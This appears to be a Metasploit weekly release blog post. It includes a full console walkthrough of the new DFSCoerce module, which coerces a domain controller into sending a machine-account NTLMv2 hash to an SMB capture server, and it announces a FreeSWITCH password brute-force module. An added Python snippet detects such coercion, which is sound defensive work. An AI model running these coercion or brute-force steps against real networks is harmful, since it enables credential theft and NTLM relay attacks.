Metasploit Weekly Wrap-Up

## DFSCoerce – Distributing more than just files

![Metasploit Weekly Wrap-Up](https://blog.rapid7.com/content/images/2022/07/metasploit-fence.png)

DFS (Distributed File System) is now distributing Net-NTLM credentials thanks to [Spencer McIntyre]() with a new `auxiliary/scanner/dcerpc/dfscoerce` module that is similar to PetitPotam in how it functions. Note that, unlike PetitPotam, this technique does require a normal domain user's credentials to work.

The following shows the workflow for targeting a 64-bit Windows Server 2019 domain controller. Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine account:

```
msf6 > use auxiliary/server/capture/smb
msf6 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/capture/smb) >
[*] Server is running. Listening on 0.0.0.0:445
[*] Server started.
msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96
RHOSTS => 192.168.159.96
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle
SMBUser => aliddle
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1
SMBPass => Password1
msf6 auxiliary(scanner/dcerpc/dfscoerce) > run
[*] 192.168.159.96:445 - Connecting to Distributed File System (DFS) Namespace Management Protocol
[*] 192.168.159.96:445 - Binding to netdfs...
[+] 192.168.159.96:445 - Bound to netdfs
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client : 192.168.250.237
[SMB] NTLMv2-SSP Username : MSFLAB\WIN-3MSP8K2LCGC$
[SMB] NTLMv2-SSP Hash : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:...
[+] 192.168.159.96:445 - Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful
[*] 192.168.159.96:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/dfscoerce) >
```
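The tell-tale sign of a successful coercion on the receiving end is a machine account (`$` suffix) authenticating outbound from a domain controller, which is exactly what the capture server logged above. As an added example (not part of the original post or the Metasploit module), the following Python parses the capture server's `[SMB] NTLMv2-SSP` lines and flags that pattern; the domain controller address list and the second, ordinary user logon in the sample are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample: the capture-server lines from the session above plus an
# ordinary user logon for contrast (NTLMv2 blobs shortened to "...").
SAMPLE_CAPTURE = """
[SMB] NTLMv2-SSP Client : 192.168.250.237
[SMB] NTLMv2-SSP Username : MSFLAB\\WIN-3MSP8K2LCGC$
[SMB] NTLMv2-SSP Hash : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d...
[SMB] NTLMv2-SSP Client : 192.168.250.50
[SMB] NTLMv2-SSP Username : MSFLAB\\aliddle
[SMB] NTLMv2-SSP Hash : aliddle::MSFLAB:0123456789abcdef:fedcba98...
"""

# Assumption: the analyst knows which addresses are domain controllers.
DOMAIN_CONTROLLERS = {"192.168.250.237"}
LINE_RE = re.compile(r"^\[SMB\] NTLMv2-SSP (Client|Username|Hash) : (.+)$")

@dataclass
class NtlmCapture:
    client: str
    domain: str
    username: str

    def is_machine_account(self) -> bool:
        # Computer accounts end in "$"; an interactive user's account never does.
        return self.username.endswith("$")

def parse_captures(text):
    """Group Client/Username/Hash triples into records; the hash blob only closes a record."""
    records, current = [], {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        field, value = m.group(1), m.group(2).strip()
        if field == "Client":
            current = {"client": value}
        elif field == "Username":
            domain, _, user = value.rpartition("\\")
            current.update(domain=domain, username=user)
        elif field == "Hash" and "client" in current and "username" in current:
            records.append(NtlmCapture(current["client"], current["domain"], current["username"]))
            current = {}
    return records

def coerced_auth_alerts(records, domain_controllers=DOMAIN_CONTROLLERS):
    """A machine account authenticating outbound from a DC is the receiving-side signature of coercion (PetitPotam, DFSCoerce)."""
    return [r for r in records if r.is_machine_account() and r.client in domain_controllers]
```

The same rule applies to any NTLM authentication log that records source address and account name; only the parser is specific to the capture server's output.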

## FreeSWITCH Brute Force Login

A returning contributor [krastanoel]() has brought us a module for brute forcing the login credential for the FreeSWITCH event socket service.
This is even simpler to use than our usual login scanner modules since there’s no need to determine or brute force a username — only the password is required!

## New module content (2)

* [DFSCoerce]() by Spencer McIntyre, Wh04m1001, and xct_de – This adds a scanner module that implements the dfscoerce technique. Although this technique leverages MS-DFSNM methods, this module works similarly to PetitPotam in that it coerces authentication attempts to other machines over SMB. This ability to coerce authentication attempts makes it particularly useful in NTLM relay attacks.
* [FreeSWITCH Event Socket Login]() by krastanoel – This adds an auxiliary scanner module that brute forces the FreeSWITCH event socket service login interface to guess the password.

## Enhancements and features (1)

* [#16716]() from [bcoles]() – This updates HTTP Command stagers to expose the CMDSTAGER::URIPATH option, so users can choose where to host the payload when using a command stager.

## Bugs fixed (3)

* [#16704]() from [gwillcox-r7]() – This fixes an issue when targeting some faulty `memcached` servers that return an error when extracting the keys and values stored in `slabs`. The module no longer errors out with a type conversion error.
* [#16724]() from [bcoles]() – This updates and fixes the `exploit/windows/iis/ms01_026_dbldecode` module. It now uses the standard HttpClient, the TFTP stager has been fixed, and Meterpreter specific code has been removed since Meterpreter is not available on Server 2000 systems since Metasploit v6.
* [#16731]() from [space-r7]() – Fixes a logic bug in the process API that caused more permissions to be requested than were intended.

## Get it

As always, you can update to the latest Metasploit Framework with `msfupdate`
and you can get more details on the changes since the last blog post from
GitHub:

* [Pull Requests 6.2.5…6.2.6]()
* [Full diff 6.2.5…6.2.6]()

If you are a `git` user, you can clone the [Metasploit Framework repo]() (master branch) for the latest.
To install fresh without using git, you can use the open-source-only [Nightly Installers]() or the
[binary installers]() (which also include the commercial edition).